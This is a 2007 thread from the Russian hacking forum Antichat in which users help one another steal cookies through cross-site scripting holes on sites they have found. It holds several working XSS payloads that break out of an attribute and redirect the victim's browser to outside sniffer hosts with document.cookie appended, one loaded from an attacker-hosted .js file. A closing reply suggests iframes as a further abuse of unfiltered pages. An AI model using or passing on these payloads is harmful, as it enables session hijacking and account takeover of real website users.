Форум АНТИЧАТ - Java-скрипт перенапрваляющий на снифер

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Java-скрипт перенапрваляющий на снифер (https://forum.antichat.xyz/showthread.php?t=53241)

RamN999

09.11.2007 23:10

Java-скрипт перенапрваляющий на снифер

Добрый день!
Подскажите пожалуста содержания скрипта
чтоб он напрвалял куки на снифер.
Например
в xxs уязвимости я писал бы <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

и получал бы куки на снифер..
тоесть надо содержание xss.js

спс

__mad

09.11.2007 23:18

RamN999

10.11.2007 00:06

Я сделал файл xss1.js с такаим содержание :
<script>document.location='http://hackedpro.org/tools/sniff/s.gif' +document.cookie</script>

И залил его сюда: http://xss999.jino-net.ru/xss1.js

теперь я в найденой xss уязвимости пишу : "'><SCRIPT SRC=http://xss999.jino-net.ru/xss1.js></SCRIPT>

но всёравно посемуто не получаю лог на снифер, где я ошибся?

Piflit

10.11.2007 00:15

пиши в найденной xss "'><script>document.location='http://ha.ckers.org/xss.js' +document.cookie</script>

__mad

10.11.2007 00:20

кароч читай вот это http://bugtraq.ru/library/www/xssanatomy.html

RamN999

10.11.2007 19:10

Всё спс разобрался,но теперь ещё вопрос есть..
Что можно сделать(помимо воровства куки) с помощью Xss уязвимости, если ваще нет никакой фильтрацции, тоесть допустимы любые теги?

fly	10.11.2007 22:31

Ифрейм!)

Время: 03:20